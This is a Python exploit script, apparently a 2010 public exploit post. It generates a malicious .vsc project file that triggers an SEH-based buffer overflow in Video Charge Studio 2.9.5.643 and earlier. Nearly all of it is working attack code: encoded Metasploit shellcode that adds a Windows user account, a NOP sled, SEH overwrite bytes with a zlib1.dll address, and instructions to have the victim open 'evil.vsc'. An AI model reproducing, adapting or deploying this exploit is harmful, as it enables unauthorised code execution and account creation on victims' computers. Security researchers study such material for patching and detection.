Video Charge Studio 2.9.5.643 Buffer Overflow

`#!/usr/bin/python  
# Exploit Title: Video Charge Studio <= 2.9.5.643 (.vsc) Buffer Overflow (SEH)  
# Date: 12/05/2010  
# Author: xsploitedsec  
# URL: http://www.x-sploited.com/  
# Contact: xsploitedsecurity [at] x-sploited.com  
# Software Link: http://www.videocharge.com/download/VideoChargeStudio_Install.exe  
# Version: <= 2.9.5.643 (Latest)  
# Tested on: Windows XP SP3 (Physical machine)  
# CVE: N/A  
  
### Software Description: ###  
# Videocharge Studio is a video editing software which is intended for those users who  
# regularly work with video, create Internet video galleries, convert video files.  
# Videocharge Studio includes all features for video editing: video converting, splitting  
# video into parts, joining several video files into a single one, adding watermark on  
# video or image (add logo to video or photo), embedding image into video file, creating  
# video from several images, editing audio. Videocharge Studio can edit video without  
# reencoding as well.  
  
### Exploit information: ###  
# Video Charge Studio is prone to a buffer overflow when parsing a malicious vsc files  
# "Filename" value field.  
# An attacker could trick a user into loading a specially crafted vsc file to execute  
# arbitrary code on a users PC without there consent.  
  
### Shouts: ###  
# kaotix, sheep, deca, havalito, corelanc0d3r/corelan team, exploit-db crew, packetstormsecurity  
# Have fun!  
  
# "When you know that you're capable of dealing with whatever comes, you have the only  
# security the world has to offer." -Harry Browne  
  
import struct  
import sys  
  
about = "=================================================\n"  
about += " Video Charge Studio <= 2.9.5.643 (.vsc) BoF (SEH)\n"  
about += " Author: xsploited security\n URL: http://www.x-sploited.com/\n"  
about += " Contact: xsploitedsecurity [at] gmail.com\n"  
about += "=================================================\n"  
print about  
  
# msfpayload windows/adduser user=xsploited pass=sec EXITFUNC=seh  
# R | msfencode -e x86/fnstenv_mov -c 1 -t perl -b '\x00\x09\x0a  
# \x0d\x3e\x3c\x26\x20\x21\x22\x23\x2a\x07' > /tmp/encoded.txt  
# [*] x86/fnstenv_mov succeeded with size 302 (iteration=1)  
  
shellcode = (  
"\x6a\x46\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xce"  
"\xcf\xb0\x91\x83\xeb\xfc\xe2\xf4\x32\x27\x39\x91\xce\xcf"  
"\xd0\x18\x2b\xfe\x62\xf5\x45\x9d\x80\x1a\x9c\xc3\x3b\xc3"  
"\xda\x44\xc2\xb9\xc1\x78\xfa\xb7\xff\x30\x81\x51\x62\xf3"  
"\xd1\xed\xcc\xe3\x90\x50\x01\xc2\xb1\x56\x2c\x3f\xe2\xc6"  
"\x45\x9d\xa0\x1a\x8c\xf3\xb1\x41\x45\x8f\xc8\x14\x0e\xbb"  
"\xfa\x90\x1e\x9f\x3b\xd9\xd6\x44\xe8\xb1\xcf\x1c\x53\xad"  
"\x87\x44\x84\x1a\xcf\x19\x81\x6e\xff\x0f\x1c\x50\x01\xc2"  
"\xb1\x56\xf6\x2f\xc5\x65\xcd\xb2\x48\xaa\xb3\xeb\xc5\x73"  
"\x96\x44\xe8\xb5\xcf\x1c\xd6\x1a\xc2\x84\x3b\xc9\xd2\xce"  
"\x63\x1a\xca\x44\xb1\x41\x47\x8b\x94\xb5\x95\x94\xd1\xc8"  
"\x94\x9e\x4f\x71\x96\x90\xea\x1a\xdc\x24\x36\xcc\xa4\xce"  
"\x3d\x14\x77\xcf\xb0\x91\x9e\xa7\x81\x1a\xa1\x48\x4f\x44"  
"\x75\x31\xbe\xa3\x24\xa7\x16\x04\x73\x52\x4f\x44\xf2\xc9"  
"\xcc\x9b\x4e\x34\x50\xe4\xcb\x74\xf7\x82\xbc\xa0\xda\x91"  
"\x9d\x30\x65\xf2\xa3\xab\x9e\xf4\xb6\xaa\x90\xbe\xad\xef"  
"\xde\xf4\xba\xef\xc5\xe2\xab\xbd\x90\xe9\xbd\xbf\xdc\xfe"  
"\xa7\xbb\xd5\xf5\xee\xbc\xd5\xf2\xee\xe0\xf1\xd5\x8a\xef"  
"\x96\xb7\xee\xa1\xd5\xe5\xee\xa3\xdf\xf2\xaf\xa3\xd7\xe3"  
"\xa1\xba\xc0\xb1\x8f\xab\xdd\xf8\xa0\xa6\xc3\xe5\xbc\xae"  
"\xc4\xfe\xbc\xbc\x90\xe9\xbd\xbf\xdc\xfe\xa7\xbb\xd5\xf5"  
"\xee\xe0\xf1\xd5\x8a\xcf\xba\x91"  
);  
  
header = (  
"\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30"  
"\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x57\x69\x6e\x64\x6f\x77\x73\x2d"  
"\x31\x32\x35\x32\x22\x20\x3f\x3e\x3c\x63\x6f\x6e\x66\x69\x67\x20\x76\x65\x72\x3d"  
"\x22\x32\x2e\x39\x2e\x35\x2e\x36\x34\x33\x22\x3e\x0d\x0a\x3c\x63\x6f\x6c\x73\x20"  
"\x6e\x61\x6d\x65\x3d\x22\x46\x69\x6c\x65\x73\x22\x2f\x3e\x0d\x0a\x3c\x63\x6f\x6c"  
"\x73\x20\x6e\x61\x6d\x65\x3d\x22\x50\x72\x6f\x66\x69\x6c\x65\x73\x22\x3e\x0d\x0a"  
"\x3c\x50\x72\x6f\x70\x65\x72\x74\x79\x20\x6e\x61\x6d\x65\x3d\x22\x50\x72\x6f\x66"  
"\x69\x6c\x65\x22\x3e\x0d\x0a\x3c\x63\x6f\x6c\x73\x20\x6e\x61\x6d\x65\x3d\x22\x46"  
"\x6f\x72\x6d\x61\x74\x73\x22\x3e\x0d\x0a\x3c\x50\x72\x6f\x70\x65\x72\x74\x79\x20"  
"\x6e\x61\x6d\x65\x3d\x22\x46\x6f\x72\x6d\x61\x74\x22\x3e\x0d\x0a\x3c\x56\x61\x6c"  
"\x75\x65\x20\x6e\x61\x6d\x65\x3d\x22\x4e\x61\x6d\x65\x22\x20\x74\x79\x70\x65\x3d"  
"\x22\x38\x22\x20\x76\x61\x6c\x75\x65\x3d\x22"  
);  
  
footer = (  
"\x22\x2f\x3e\x0d\x0a\x3c\x2f\x50\x72\x6f\x70\x65\x72\x74\x79\x3e\x0d\x0a"  
"\x3c\x2f\x63\x6f\x6c\x73\x3e\x0d\x0a\x3c\x2f\x50\x72\x6f\x70\x65\x72\x74\x79\x3e\x0d"  
"\x0a\x3c\x2f\x63\x6f\x6c\x73\x3e\x0d\x0a\x3c\x2f\x63\x6f\x6e\x66\x69\x67\x3e"  
);  
  
size = 824; #824 junk bytes triggers the bof  
  
payload = "\x90" * (size - len(shellcode));  
payload += shellcode  
  
payload += "\xEB\x06\x90\x90"; #jmp short  
payload += struct.pack("<L",0x61B8451C); #universal p/p/r - zlib1.dll (Apps path)  
payload += "\xe9\xe0\xfc\xff\xff"; #jmp back 800 bytes  
  
xsploit = header + payload + footer;  
  
print("[*] Creating .vsc file");  
print "[*] Payload size = " + str(len(payload)) + " bytes";  
  
try:  
out_file = open("evil.vsc",'w');  
out_file.write(xsploit);  
out_file.close();  
print("[*] Malicious vsc file created successfully");  
print("[*] Launch Video Charge Studio and load the file\n[*] Exiting...\r\n");  
except:  
print "[!] Error creating file";  
  
`